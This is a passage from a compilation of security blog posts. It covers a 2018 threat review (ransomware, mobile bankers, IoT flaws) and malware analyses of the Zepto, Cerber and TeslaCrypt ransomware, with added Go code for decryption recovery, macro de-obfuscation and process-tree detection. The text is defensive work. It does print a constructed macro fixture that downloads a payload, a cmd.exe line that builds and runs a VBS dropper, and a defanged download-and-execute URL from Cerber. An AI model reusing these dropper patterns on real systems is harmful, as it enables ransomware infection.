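// files cancels E_K(IV) and leaves P1 XOR P1'. A file whose first 16 bytes are known
// (a fixed format header) therefore reveals the first 16 bytes of any other file.
func RecoverFirstBlock(knownCipher, knownPlain, targetCipher []byte) []byte {
	out := make([]byte, aes.BlockSize)
	for i := range out {
		out[i] = knownCipher[i] ^ knownPlain[i] ^ targetCipher[i]
	}
	return out
}

func main() {
	// Constructed sample files: a PDF-like document and a ZIP-like archive.
	pdf := []byte("%PDF-1.7\n% constructed sample document body ...")
	zip := []byte("PK\x03\x04\x14\x00\x06\x00\x08\x00 constructed archive data")
	encPDF, _ := cfbTransform(pdf, fixedKey, zeroIV, false)
	encZIP, _ := cfbTransform(zip, fixedKey, zeroIV, false)

	recovered, _ := RecoverOffline(encZIP)
	fmt.Println("offline recovery matches original:", bytes.Equal(recovered, zip))

	// Knowing only that the other file is a PDF, recover the archive's first block.
	first := RecoverFirstBlock(encPDF, pdf[:aes.BlockSize], encZIP)
	fmt.Printf("first block of archive without key: %q\n", first)
}
```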

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where a lack of standardization leaves developers free to ignore security, or to treat it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove from public access all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server rather than relying solely on the system. As a result, the others are vulnerable to man-in-the-middle (MitM) attacks – intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

Zepto Evasion Techniques

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.)

Fig: Zepto spam

As we dug deeper into our analysis, we found that these macro scripts are not crafted manually. The malware authors have automated the creation and obfuscation of their code. This kind of randomized obfuscation is one way of evading antivirus engines. As outlined below, our research highlights several methods employed to dynamically evolve the attack vector in order to circumvent detection.

From the malicious emails we have gathered, we will examine the attachments to analyze key differences and common characteristics.

In one sample, the malicious code was written and spread across 3 sub modules:

Fig: Zepto automation

In another sample, 5 sub modules are used for the malicious code:

Fig: Zepto obfuscation

Examining the sub modules of the file shows that it has some common signatures that we can look for:

Fig: Zepto code

Fig: Zepto hidden code

We were able to find blocks of code that share common structures. Remember that these blocks were found in different parts, or at different indexes, of the module. From a programmer’s perspective it may seem a little odd to see code like this, but as the analysis continues we can say that this is just one part of the malware author’s strategy to hide the code and confuse incident responders.

Notice the highlighted strings that are common to both screenshots. At first glance they look meaningless; the significant strings only emerge once garbage strings such as:

  • “RIIM”
  • “PORKKI”

are removed or replaced, after which they read:

  • “microsoft”
  • “Adodb.stream”
  • “script”
  • “application”
Additionally, and perhaps more significantly, there is the activity of these scripts. You will also notice that the highlighted strings are surrounded by what we can now assume is garbage code, inserted for misdirection and to further obfuscate the malicious code.
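
As an added example, not code from the post or from the samples, the following Go program automates the string clean-up described above: it pulls the string literals out of a constructed VBA fragment written in the same style, guesses the junk tokens as all-caps runs that recur across literals (a heuristic assumed here, matching how RIIM and PORKKI appear), strips them, and reports which of the revealed names are on a watchlist. The macro text, the extra watchlist names XmlHttp and Shell, and the host name example.invalid are constructed.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// sampleMacro is a constructed VBA fragment written in the style the post describes:
// string literals padded with recurring junk tokens and concatenated at run time. It is
// not one of the actual Zepto samples, and the host name is a reserved example name.
const sampleMacro = `
Sub AutoOpen()
    Dim a, b, c, d, u
    a = "MiRIIMcroPORKKIsoft" & ".XmRIIMlHttp"
    b = "AdoPORKKIdb.StRIIMream"
    c = "WscrPORKKIipt.ShRIIMell"
    d = "ShRIIMell.ApplPORKKIication"
    u = "htRIIMtp://" & "examPORKKIple.inRIIMvalid/" & "paPORKKIyload"
    Set h = CreateObject(a)
    h.Open "GET", u, False
End Sub
`

var (
	literalRe  = regexp.MustCompile(`"([^"]*)"`)
	upperRunRe = regexp.MustCompile(`[A-Z]{3,}`)
	// watchlist holds the names the post says surface once the junk is removed, plus
	// two further downloader staples (XmlHttp, Shell) added for this example.
	watchlist = []string{"microsoft", "adodb.stream", "script", "application", "xmlhttp", "shell"}
)

// Literals returns every double-quoted string literal in a VBA source fragment.
func Literals(src string) []string {
	var out []string
	for _, m := range literalRe.FindAllStringSubmatch(src, -1) {
		out = append(out, m[1])
	}
	return out
}

// FindJunkTokens guesses the padding tokens without a hand-made list: runs of three or
// more capital letters that recur in at least minHits distinct literals. The heuristic is
// this example's assumption (the posted samples used all-caps junk such as RIIM and
// PORKKI); genuine VBA string content seldom repeats such runs across unrelated literals.
func FindJunkTokens(lits []string, minHits int) []string {
	hits := map[string]int{}
	for _, lit := range lits {
		seen := map[string]bool{}
		for _, run := range upperRunRe.FindAllString(lit, -1) {
			if !seen[run] {
				seen[run] = true
				hits[run]++
			}
		}
	}
	var tokens []string
	for tok, n := range hits {
		if n >= minHits {
			tokens = append(tokens, tok)
		}
	}
	sort.Strings(tokens)
	return tokens
}

// Strip removes every junk token from one literal, leaving the string the macro meant.
func Strip(lit string, tokens []string) string {
	for _, t := range tokens {
		lit = strings.ReplaceAll(lit, t, "")
	}
	return lit
}

// Deobfuscate strips the junk from all literals and joins them in source order, so that
// a string split across a concatenation ("Mi...soft" & ".XmlHttp") matches as one.
func Deobfuscate(src string) (tokens []string, cleaned string) {
	lits := Literals(src)
	tokens = FindJunkTokens(lits, 3)
	parts := make([]string, 0, len(lits))
	for _, l := range lits {
		parts = append(parts, Strip(l, tokens))
	}
	return tokens, strings.Join(parts, "")
}

// Indicators reports which watchlist names occur in the cleaned text (case-insensitive).
func Indicators(cleaned string) []string {
	low := strings.ToLower(cleaned)
	var found []string
	for _, w := range watchlist {
		if strings.Contains(low, w) {
			found = append(found, w)
		}
	}
	return found
}

func main() {
	tokens, cleaned := Deobfuscate(sampleMacro)
	fmt.Println("junk tokens :", tokens)
	fmt.Println("cleaned     :", cleaned)
	fmt.Println("indicators  :", Indicators(cleaned))
}
```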

Basically, the usual flow of the scripts analyzed will go like this:

Fig: Zepto infection process

At this point, the payload of the downloaded Zepto ransomware will take over.

As observed with the Zepto downloaders, the scripts also vary in their encrypted URLs. Below are some of the URLs from which the monitored scripts attempted to download Zepto. Imagine how many of them are generated and how many differently structured scripts are available in the wild. Zepto is not only distributed through macro scripts; there are also JavaScript and WSF script downloaders.

Fig: Zepto download links

With some twists of social engineering, creativity and advanced programming skills, cybercriminals are becoming increasingly adept at delivering Zepto and other ransomware payloads to both business and home users.

Fig: Zepto infection screen

Prevent Ransomware Infections?

To prevent ransomware, we recommend blocking it early, at the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malware even tells you how to enable macros, or may mislead you into doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data

VIPRE Antivirus Detections for this threat include:

  • Trojan-Downloader.O97M.Donoff.by (v)
  • Trojan-Downloader.O97M.Donoff.bu (v)
  • OLE.Generic.a (v)

Md5:
bb1ddad0780314a8dd51a4740727aba5
7e9657149c0062751c96baf00c89a57a

Reference:

Zepto Ransomware Packed into WSF Spam

Analysis by Daryl Tupaz

The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

Fig: ransomware spam with infected WSF attachment (three samples)

The zip attachments contain the WSF.

Fig: infected WSF file

An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Fig: Zepto ransomware analysis

Since this is a script, we are mostly concerned with the call tree from WScript.exe. One notable result, circled above, is the number of modified files. This indicates a high likelihood that the sample is either a virus or ransomware. And considering the proliferation of ransomware attacks lately, that’s our biggest concern.

There are two captured screen shots from our analysis.

Fig: Zepto ransomware analysis, infection screen

Expanding the MODIFIED FILES shows this result.

Fig: ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.

Fig: ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to mercumaya.net.

Let’s look at the two files in the Temp folder.

This is the binary view of the UL43Fok40ii file:

Fig: Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file, a complete PE file:

Fig: ransomware code processes analysis

A difference of only 4 bytes between the two sizes (208,008 bytes and 208,004 bytes) suggests that the file without the .exe filename extension was decrypted to form the PE executable. Afterwards, the WSF script ran the PE executable with the argument “321”.

Fig: ransomware sandbox analysis

Expanding the Network connections:

Fig: ransomware sandbox analysis

With the com.my suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes, the same as the size of the encrypted file.

The WSF file executed by the WScript.exe simply downloaded then decrypted a Windows PE file then executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

Fig: Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

Fig: ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

Fig: ransomware sandbox analysis

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.


TA displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:


This malware also renamed a lot of files. This is the behavior that encrypts files while renaming the file using a GUID filename with a “.zepto” filename suffix.


When searching for files, it targets the phone book file first, before traversing the drive from the root directory.


Some notable files were also created. The captured screenshot shows the contents of the _HELP_instructions.bmp file.


This malware sample attempts to move its running executable to a file in the Temp folder.


With Chrome set as the default browser, the malware opens the file _HELP_instructions.html that it previously created on the Desktop. It also deletes the malware copy from the Temp folder, probably as part of its clean-up phase.


Here’s what _HELP_instructions.html looks like when opened in a browser.


The processes in the call tree under Chrome.exe are most likely invoked by the browser and are not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked using Windows Scripting Files in the hope of passing through email gateways that don’t block WSF files in attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

A Look at the Cerber Office 365 Ransomware

Reports of a zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other zero-day threats that have been popping up like mushrooms of late, the main method of infection is through the use of Office macros.

This blog provides an analysis on the Cerber variant using traditional reverse-engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering, more often than not, requires that one gets a broad view of what the target is doing. Whether you’re analyzing a malware sample or trying to figure out what a function does in obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look at what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating threat intelligence, to quickly obtain IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and, based on that particular set of behaviors, predict whether the program in question is malicious or benign.

Fig: ThreatAnalyzer’s unique behavior determination engine

Fig 1: ThreatAnalyzer 6.1 in action

Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:

  1. Determines that the sample is malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observes the sample trying to beacon to blacklisted URLs
    2. The sample is detected by one or more antivirus engines
    3. Based on the behavior it performed, there is a high probability that the sample is malicious
  2. Shows the researcher/user the changes it made to the Registry and to files (IO), the network attempts it made, and the processes it spawned
  3. Compacts all the detailed information it has gathered into a downloadable PDF or XML report. If the user chooses, they can download an archive that includes the detailed report, any significant files that were generated, screenshots of the windows spawned and a copy of the PCAP file if any network activity was logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set "GSI=%APPDATA%\%RANDOM%.vbs" (for %i in ("DIm RWRL" "FuNCtioN GNbiPp(Pt5SZ1)" "EYnt=45" "GNbiPp=AsC(Pt5SZ1)" "Xn1=52" "eNd fuNCtiON" "SUb OjrYyD9()"
    • Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://solidaritedeproximite.org/mhtr.jpg
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1

These are highly suspicious activities, given that we were analyzing an Office document file; the behavior above cannot be classified as normal. So the next time you’re nervous about opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.
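
The chain listed above (WINWORD.EXE spawning cmd.exe, which builds and runs a VBS, which in turn runs a .TMP from %appdata%) and the WSF chain from the previous post (WScript.exe running a decrypted PE out of %TEMP% with the argument "321") share a process-tree shape that any sandbox report or endpoint sensor exposes. The Go program below is an added example, not ThreatAnalyzer's code or part of the original posts: it encodes four rules for that shape and runs them over a constructed set of process-creation events; PID 3388, 15339.vbs, UL43Fok40ii.exe and "321" come from the posts, while the type, field names, paths and the benign rows are made up.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcessEvent is a minimal process-creation record with the fields a sandbox report or
// endpoint sensor supplies; the type and field names belong to this example.
type ProcessEvent struct {
	PID, PPID   int
	Image       string // file name of the new process
	CommandLine string
}

// Finding pairs a process with the rule it tripped.
type Finding struct {
	PID  int
	Rule string
}

var (
	officeApps  = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true}
	scriptHosts = map[string]bool{"wscript.exe": true, "cscript.exe": true}
	shells      = map[string]bool{"cmd.exe": true, "powershell.exe": true}
)

// hasAncestor walks the recorded parent chain of ev (bounded, in case of a cycle) and
// reports whether any ancestor's image is in want.
func hasAncestor(ev ProcessEvent, byPID map[int]ProcessEvent, want map[string]bool) bool {
	p, ok := byPID[ev.PPID]
	for depth := 0; ok && depth < 64; depth++ {
		if want[strings.ToLower(p.Image)] {
			return true
		}
		p, ok = byPID[p.PPID]
	}
	return false
}

// fromUserWritableDir matches the drop locations seen in the posts: %TEMP% for the
// decrypted Zepto PE and %APPDATA% for the Cerber .TMP.
func fromUserWritableDir(cmdline string) bool {
	low := strings.ToLower(cmdline)
	return strings.Contains(low, `\appdata\local\temp\`) || strings.Contains(low, `\appdata\roaming\`)
}

// Detect applies four behavioural rules distilled from the WSF and macro chains.
func Detect(events []ProcessEvent) []Finding {
	byPID := make(map[int]ProcessEvent, len(events))
	for _, e := range events {
		byPID[e.PID] = e
	}
	var out []Finding
	for _, e := range events {
		img, low := strings.ToLower(e.Image), strings.ToLower(e.CommandLine)
		parent, hasParent := byPID[e.PPID]
		pimg := strings.ToLower(parent.Image)
		// 1. An Office application starting a shell or script host directly.
		if hasParent && officeApps[pimg] && (shells[img] || scriptHosts[img]) {
			out = append(out, Finding{e.PID, "office-spawns-shell-or-script-host"})
		}
		// 2. cmd.exe assembling a .vbs with set/for, the shape of the Cerber dropper line.
		if img == "cmd.exe" && strings.Contains(low, ".vbs") && strings.Contains(low, "for %i in (") {
			out = append(out, Finding{e.PID, "cmd-builds-vbs-dropper"})
		}
		// 3. A script host anywhere below an Office process (WINWORD -> cmd -> wscript).
		if scriptHosts[img] && hasAncestor(e, byPID, officeApps) {
			out = append(out, Finding{e.PID, "script-host-under-office"})
		}
		// 4. A script host launching a freshly written .exe or .tmp from a user-writable directory.
		ext := strings.ToLower(filepath.Ext(img))
		if hasParent && scriptHosts[pimg] && fromUserWritableDir(low) && (ext == ".exe" || ext == ".tmp") {
			out = append(out, Finding{e.PID, "script-host-runs-dropped-binary"})
		}
	}
	return out
}

// sampleEvents is a constructed process tree: the Cerber chain, the Zepto WSF chain
// (PID 3388, 15339.vbs, UL43Fok40ii.exe and "321" are the posts' values) and a benign cmd.exe.
func sampleEvents() []ProcessEvent {
	return []ProcessEvent{
		{900, 1, "explorer.exe", `C:\Windows\explorer.exe`},
		{1200, 900, "WINWORD.EXE", `WINWORD.EXE /n C:\Users\u\Downloads\invoice.dotm`},
		{1300, 1200, "cmd.exe", `Cmd.exe /V /C set "GSI=%APPDATA%\%RANDOM%.vbs" (for %i in ("Dim x" "x = 1") do echo %~i>>!GSI!) & wscript !GSI!`},
		{1400, 1300, "wscript.exe", `wscript C:\Users\u\AppData\Roaming\15339.vbs`},
		{1500, 1400, "48213.tmp", `C:\Users\u\AppData\Roaming\48213.tmp`},
		{3388, 900, "WScript.exe", `"C:\Windows\System32\WScript.exe" C:\Users\u\AppData\Local\Temp\invoice.wsf`},
		{3400, 3388, "UL43Fok40ii.exe", `C:\Users\u\AppData\Local\Temp\UL43Fok40ii.exe 321`},
		{2100, 900, "cmd.exe", `cmd.exe /c dir`},
	}
}

func main() {
	for _, f := range Detect(sampleEvents()) {
		fmt.Printf("PID %d: %s\n", f.PID, f.Rule)
	}
}
```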

Good ol’ reverse engineering

Fig: Office 365 Enable Content

Looking at how this ransomware was coded, it will infect not only Office 365 users but users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious Office attachment is opened. This also depends on whether macros are enabled or, in earlier Office versions, whether macro security is set to low. Quite possibly in an attempt to slow down analysis and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Fig: Auto-execution macro inside Cerber macro

The macro then proceeds to create a script in %appdata%. The VBS is also obfuscated, but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection: it uses the Timer function to generate a random integer and compares it with a self-generated variable, and that comparison is the condition under which the code that downloads the cryptor component runs.

Using the built-in network features of VBS, it attempts to connect to a remote server and download a particular file:

httx://solidaritedeproximite.org/mhtr.jpg

This may seem harmless, as it is just a simple JPG file, right? Well, the VBS code also indicates that it will take whatever the contents of that file are, save them to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years, it is still interesting.

Fig: Download the file, save it, then run

Md5 Hash: ee0828a4e4c195d97313bfc7d4b531f1

The downloaded file is the cryptor part of the Cerber ransomware. This program is the one responsible for scanning and encrypting target files on a victim’s system. The full analysis of this component will be discussed in a separate blog. It is interesting to note that the downloaded Cerber executable will encrypt your files even in the absence of an internet connection. The code inside the EXE indicates that it does not connect to a remote server (unlike the ones before it, e.g. CryptoWall, Locky, TeslaCrypt, etc.) to encrypt the victim’s files.

Once a system is successfully infected, it displays the following on the desktop:

It also spawns an instance of your browser containing the message:

And it plays an audio message, “your documents, photos, databases, and other important files have been encrypted,” in a robotic voice.

Infection Summary

Flow of the Cerber attack scenario

  1. A spear-phishing email containing a malicious Office attachment arrives.
  2. If the user opens the email, opens the attachment AND macros are enabled in Office, the macro executes and drops a VBS script.
  3. The script contacts a remote server, then downloads and executes the cryptor part of the Cerber ransomware.
  4. The cryptor scans and encrypts the user’s files.
  5. A notice is displayed that the system has been infected by Cerber ransomware.

The post A Look at the Cerber Office 365 Ransomware appeared first on ThreatTrack Security Labs Blog.

Security is Not, and Should not be Treated as, a Special Flower

My normal Wednesday lunch yesterday was rudely interrupted by my adequate friend and reasonable security advocate Javvad calling me to ask my opinion on something. This in itself was surprising enough, but the fact that I immediately gave a strong and impassioned response told me this might be something I needed to explore further… The UK … Read More

A Close Look at TeslaCrypt 3.0 Ransomware

TeslaCrypt is yet another ransomware family taking the cyber world by storm. It is mostly distributed via spear-phishing email and through the Angler exploit kit, which exploits vulnerabilities in Adobe Flash and, on success, downloads a variant of the ransomware.

TeslaCrypt 3.0 possesses various updates, one of which renders encrypted files irrecoverable via normal means.

Infection Indicator/s
Machines infected by TeslaCrypt will usually have the following files present in almost every directory:

  • +REcovER+[Random]+.html
  • +REcovER+[Random]+.txt
  • +REcovER+[Random]+.png

The recovery instructions for the encrypted files can be found inside these files.

TeslaCrypt ransom note

Technical Details
Note: The file used for this analysis has an MD5 value of 1028929105f1e6118e06f8b7df0b3381.

The malware starts by ensuring it’s in its intended directory. For this sample, it checks if it is located in the Documents directory. If it’s not, it copies itself to that directory and executes its copy from there. It deletes itself after executing the copy.

The ransomware creates multiple threads that do the following:

  • Monitors processes and terminates those that contain the following strings:
    • taskmg
    • regedi
    • procex
    • msconfi
    • cmd
  • Contacts the C&C server and sends certain information like system information and the unique system ID.
